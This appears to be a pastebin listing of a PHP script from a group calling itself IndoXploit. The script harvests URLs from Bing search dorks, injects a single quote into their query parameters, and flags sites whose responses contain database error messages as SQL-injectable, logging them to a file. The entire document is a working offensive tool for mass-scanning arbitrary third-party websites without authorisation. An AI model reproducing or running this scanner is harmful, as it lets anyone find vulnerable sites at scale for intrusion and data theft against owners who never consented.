SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | // SQL Scanner via Bing Dorker | |
| 3 | // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit | |
| 4 | // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew | |
| 5 | // usage: php sql.php 'bing_dorker' | |
| 6 | // ex: php sql.php '"page.php?id=1" site:it' | |
| 7 | ||
| 8 | set_time_limit(0); | |
| 9 | error_reporting(0); | |
| 10 | @ini_set('memory_limit', '64M');
| |
| 11 | @header('Content-Type: text/html; charset=UTF-8');
| |
| 12 | ||
| 13 | function cover() {
| |
| 14 | print " ****** SQL Scanner via Bing Dorker ******\n"; | |
| 15 | print " ***** Coded by l0c4lh34rtz - IndoXploit *****\n"; | |
| 16 | print " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****\n"; | |
| 17 | print " *** usage: php sql.php 'bing_dork' ***\n"; | |
| 18 | print " ** ex: php sql.php '\"page.php?id=1\" site:it' **\n\n"; | |
| 19 | } | |
| 20 | $error[] = 'You have an error in your SQL'; | |
| 21 | $error[] = 'supplied argument is not a valid MySQL result resource in'; | |
| 22 | $error[] = 'Division by zero in'; | |
| 23 | $error[] = 'Call to a member function'; | |
| 24 | $error[] = 'Microsoft JET Database'; | |
| 25 | $error[] = 'ODBC Microsoft Access Driver'; | |
| 26 | $error[] = 'Microsoft OLE DB Provider for SQL Server'; | |
| 27 | $error[] = 'Unclosed quotation mark'; | |
| 28 | $error[] = 'Microsoft OLE DB Provider for Oracle'; | |
| 29 | $error[] = 'Incorrect syntax near'; | |
| 30 | $error[] = 'SQL query failed'; | |
| 31 | $error[] = 'Warning: filesize()'; | |
| 32 | $error[] = 'Warning: preg_match()'; | |
| 33 | $error[] = 'Warning: array_merge()'; | |
| 34 | $error[] = 'Warning: mysql_query()'; | |
| 35 | $error[] = 'Warning: mysql_num_rows()'; | |
| 36 | $error[] = 'Warning: session_start()'; | |
| 37 | $error[] = 'Warning: getimagesize()'; | |
| 38 | $error[] = 'Warning: mysql_fetch_array()'; | |
| 39 | $error[] = 'Warning: mysql_fetch_assoc()'; | |
| 40 | $error[] = 'Warning: is_writable()'; | |
| 41 | $error[] = 'Warning: Unknown()'; | |
| 42 | $error[] = 'Warning: mysql_result()'; | |
| 43 | $error[] = 'Warning: pg_exec()'; | |
| 44 | $error[] = 'Warning: require()'; | |
| 45 | ||
| 46 | function getsource($url) {
| |
| 47 | $curl = curl_init($url); | |
| 48 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); | |
| 49 | $content = curl_exec($curl); | |
| 50 | curl_close($curl); | |
| 51 | return $content; | |
| 52 | } | |
| 53 | function inject($url) {
| |
| 54 | $data = getsource(str_replace("=", "='", $url));
| |
| 55 | $errors = implode("|", $GLOBALS['error']);
| |
| 56 | return preg_match("#{$errors}#i", $data);
| |
| 57 | } | |
| 58 | function simpen($isi) {
| |
| 59 | $f = fopen("result_sql.txt","a+");
| |
| 60 | fwrite($f, "$isi\n"); | |
| 61 | fclose($f); | |
| 62 | } | |
| 63 | ||
| 64 | $do = urlencode($argv[1]); | |
| 65 | if(isset($argv[1])) {
| |
| 66 | cover(); | |
| 67 | $npage = 1; | |
| 68 | $npages = 30000; | |
| 69 | $allLinks = array(); | |
| 70 | $lll = array(); | |
| 71 | while($npage <= $npages) {
| |
| 72 | $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
| |
| 73 | if($x) {
| |
| 74 | preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
| |
| 75 | foreach ($findlink[1] as $fl) array_push($allLinks, $fl); | |
| 76 | $npage = $npage + 10; | |
| 77 | if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
| |
| 78 | } else break; | |
| 79 | } | |
| 80 | foreach($allLinks as $url) {
| |
| 81 | $urls = parse_url($url, PHP_URL_HOST); | |
| 82 | $urls = "http://$urls/"; | |
| 83 | if($_SESSION[$urls]) {
| |
| 84 | // | |
| 85 | } else {
| |
| 86 | $_SESSION[$urls] = "1"; | |
| 87 | if(inject($url)) {
| |
| 88 | print " $url -> Vuln!!\n"; | |
| 89 | simpen($url); | |
| 90 | } | |
| 91 | } | |
| 92 | } | |
| 93 | } else {
| |
| 94 | print "usage: php ".$argv[0]." 'bing_dork'\n"; | |
| 95 | print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n"; | |
| 96 | } | |
| 97 | ?> |
